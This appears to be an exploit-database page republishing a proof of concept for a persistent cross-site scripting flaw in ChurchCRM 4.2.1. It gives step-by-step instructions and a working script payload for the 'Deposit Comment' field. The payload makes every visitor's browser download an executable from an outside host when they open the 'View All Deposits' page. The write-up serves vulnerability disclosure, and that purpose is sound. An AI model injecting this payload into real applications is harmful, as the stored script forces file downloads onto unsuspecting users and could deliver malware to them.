Churchcrm 4.2.1 persistent cross site scripting (xss) Vulnerability / Exploit

  /     /     /  

Exploits / Vulnerability Discovered : 2020-12-02 | Type : webapps | Platform : multiple
This exploit / vulnerability Churchcrm 4.2.1 persistent cross site scripting (xss) is for educational purposes only and if it is used you will do on your own risk!

[+] Code ...

#Exploit Title: ChurchCRM 4.2.1- Persistent Cross Site Scripting(XSS)
#Date: 2020- 10- 29
#Exploit Author: Mufaddal Masalawala
#Vendor Homepage: https://churchcrm.io/
#Software Link: https://github.com/ChurchCRM/CRM
#Version: 4.2.1
#Tested on: Kali Linux 2020.3
#Proof Of Concept:
ChurchCRM application allows stored XSS , via 'Add new Deposit' module, that is rendered upon 'View All Deposits' page visit. There are multiple locations where this can be replicated To exploit this vulnerability:

1. Login to the application, go to 'View all Deposits' module.
2. Add the payload ( <script>var link = document.createElement('a');
link.href = 'http://the.earth.li/~sgtatham/putty/latest/x86/putty.exe';
link.download = ''; document.body.appendChild(link); link.click();
</script>
) in the 'Deposit Comment' field and click "Add New Deposit".
3. Payload is executed and a .exe file is downloaded.

Churchcrm 4.2.1 persistent cross site scripting (xss)


Last added Exploits Vulnerabilities

▸ soplanning 1.52.01 (simple online planning tool) - remote code execution (rce) (authenticated) ◂
Discovered: 2024-11-15
Type: webapps
Platform: php
▸ rengine 2.2.0 - command injection (authenticated) ◂
Discovered: 2024-10-01
Type: webapps
Platform: multiple
▸ opensis 9.1 - sqli (authenticated) ◂
Discovered: 2024-10-01
Type: webapps
Platform: php



Tags:
Churchcrm 4.2.1 persistent cross site scripting (xss) Vulnerability / Exploit